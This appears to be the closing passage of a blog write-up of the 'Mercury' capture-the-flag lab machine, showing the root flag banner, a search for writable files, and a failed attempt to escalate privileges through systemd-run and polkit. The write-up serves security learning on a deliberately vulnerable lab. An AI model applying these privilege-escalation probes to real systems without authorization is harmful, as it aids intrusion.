@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]

At this point, privilege escalation is complete. The remaining output records two other avenues that were checked along the way: a search for writable files, which turned up nothing beyond the user's own dotfiles, and a polkit authentication agent attempt.

linuxmaster@mercury:/usr/share$ find / -type f -writable -not -path "/sys*" -not -path "/proc*" 2>/dev/null
/home/linuxmaster/.bashrc
/home/linuxmaster/.bash_logout
/home/linuxmaster/.profile
/home/linuxmaster/.cache/motd.legal-displayed

polkit-agent-helper-1 Privilege Escalation

I tried the helper-based escalation used in a previous 红队笔记 (Red Team Notes) video, but the account polkit asks us to authenticate as is mercury, whose password we do not have, so this path cannot escalate directly.

linuxmaster@mercury:/usr/share$ systemd-run -t bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to manage system services or other units.
Authenticating as: mercury
Password:
polkit-agent-helper-1: pam_authenticate failed: Authentication failure
==== AUTHENTICATION FAILED ===
Failed to start transient service unit: Access denied

THE PLANETS MERCURY
https://i3eg1nner.github.io/2023/06/b0b39d4ac246.html
Author: I3eg1nner
Published: 16 June 2023
License